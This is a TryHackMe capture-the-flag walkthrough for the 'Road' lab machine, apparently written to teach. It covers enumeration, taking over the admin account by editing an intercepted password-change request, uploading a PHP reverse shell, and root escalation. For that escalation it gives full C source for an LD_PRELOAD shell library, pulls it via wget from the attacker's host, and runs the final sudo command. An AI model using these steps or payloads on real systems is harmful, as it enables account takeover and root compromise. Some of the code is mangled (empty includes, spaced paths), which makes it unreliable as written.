Road – Walkthrough En | TryHackMe – Write-up
Inspired by a real-world pentesting engagement
Enumeration
Command :
nmap -T5 -p- 10.10.239.205
Two ports are present. SSH on port 22 and a website on port 80. Port 22 is probably useless, you have to go directly to the enumeration on the website.
Web enumeration
Command :
dirsearch -u 10.10.239.205 -x 403
Website access:
It’s basically a simple visit to see what the website looks like and see what we can do.
As it is possible to create an account, you might as well make one…
Accès au compte user
Once the account is created, you have to look at what options the user has the right to modify.
The user can do two things, change their password and upload a profile picture.
It is important to look everywhere. In particular, the note indicating that only the admin can access this function.
Broken access control
The only option the user ultimately has is to change their password. We are therefore going to change it but by intercepting the request with noise.
The following screenshot shows the password change on the browser side:
The following screenshot shows the password change on the BurpSuite side (once the request has been intercepted).
The request shows us three elements:
- email address,
- new password,
- confirmation.
As long as we know the email address of the admin account admin@sky.thm why not put it in place of ours.
Photo change
Once the modified request has been forwarded, it is possible to access the admin account.
Changement de photo
If we come back to the note, only the admin can modify his profile picture.
We will directly upload a shell in PHPsee if there is filtering at the level of extensions.
No problem, the file is saved. A message appears very furtively « image saved«
Where is the picture ?
The only problem to be solved is to find where the file is to be saved …
The answer can be found in the source code of the page. At the bottom…
<! – / v2 / profileimages / ->
Initial foothold
Direct access to the URL is not possible.
Directory listing is disabled
This is not a problem. just try to access our payload directly
With a netcat listening, we get a reverse shell.
Lateral movement: www-data to webdeveloper.
Listing with linpeas does not give important information. It appears that the netstat command was not executed. In fact, netstat is not installed on the machine. Instead, we can use ss
Command :
ss -atur
There are several ports that are listening, including port 27017. It corresponds to MongoDB
Connection to mongdb
Command to connect on DB :
mongo 127.0.0.1
Command to check databases :
show dbs
Command to select a db :
use
Command to see tables :
show collection
Command to display the contents :
db.collection .find ()
Escalation of privilege.
Once on the webdeveloper account, you have to do this command. It remains one of the first orders to be made … if not the 1st
Command :
sudo -l
The escalation of privilege is very well thought out. You must use the two information that is displayed. LD_PRELOAD and /usr/bin/sky_backup_utility.
The binary allows you to make backups with root rights. LD_PRELOAD allows you to load shared libraries when a program is loaded. In general, you must have SUDO rights.
So if we create a shared library to run sky_backup_utility with the sudo command, we could have root access if our share library refers to a root shell?
Creation of the payload
Command :
vim shell.c
copy this inside:
#include
#include
#include
void _init () {
unsetenv ("LD_PRELOAD");
setgid (0);
setuid (0);
system ("/ bin / bash");
}
Command to compile :
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
If any warnings appear of no importance. Note that the compilation can be performed on the target machine or on kali.
From Kali to transfer the shell.so file with setting up a web server:
python3 -m http.server
Command to download on host :
wget http://10.11.38.124:8000/shell.so
Final command to root the box :
sudo LD_PRELOAD = / tmp / shell.so / usr / bin / sky_backup_utility
#
That’s all folks
Thank you for taking the trouble to come to the site to read this Write Up
Hope he got you more and taught you new things.
Please feel free to leave a comment or share this article.